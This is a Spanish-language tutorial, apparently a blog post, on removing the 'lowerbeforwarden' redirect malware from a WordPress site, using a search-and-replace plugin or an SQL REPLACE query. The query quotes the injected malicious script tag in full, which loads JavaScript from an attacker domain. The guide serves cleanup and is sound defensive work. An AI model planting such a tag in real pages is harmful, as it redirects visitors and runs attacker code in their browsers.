Eliminar hackeo de malware lowerbeforwarden de WordPress

Eliminar el script que provoca el hackeo

Para eliminar el script qué provoca que las páginas se redirijan vamos a buscar el script del malware lowerbeforwarden. Esto podemos hacerlo de dos maneras bien con el plugin Better search replace o bien directamente desde la base de datos.

Es posible que debido al hackeo del malware lowerbeforwarden no podamos instalar plugin desde el mismo repositorio de WordPress, si es así descárgate e instala de forma manual el plugin Better search replace desde aquí.

Eliminar el malware lowerbeforwarden con el plugin Better search replace.

Para eliminar el malware lowerbeforwarden con este plugin vamos a buscar bien el script completo o bien solo el nombre que reemplazaremos por un campo vacío y seleccionaremos todas las tablas.

Si este primer paso ha salido bien habremos solucionado gran parte del problema y es posible que nuestra web ya no se redirija.

Eliminando el malware lowerbeforwarden desde la base de datos

Si el hackeo no nos permite realizar esta modificación desde el mismo panel de WordPress vamos a hacerlo desde la base de datos.

Una vez entremos en nuestro panel de phpmyadmin vamos a dirigirnos a la sección de consulta en la cual vamos a pegar lo siguiente para tratar de eliminarlos todos ejecutando este script en SQL.

UPDATE wp_posts SET post_content = (REPLACE (post_content, “<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>”, ""));

Si todo sale correctamente habremos podido eliminar el malware lowerbeforwarden de nuestra web.

Del mismo modo que en el paso anterior si este código falla prueba con distintas variables como el nombre o la URL, ya que lo que no queremos es que redirija.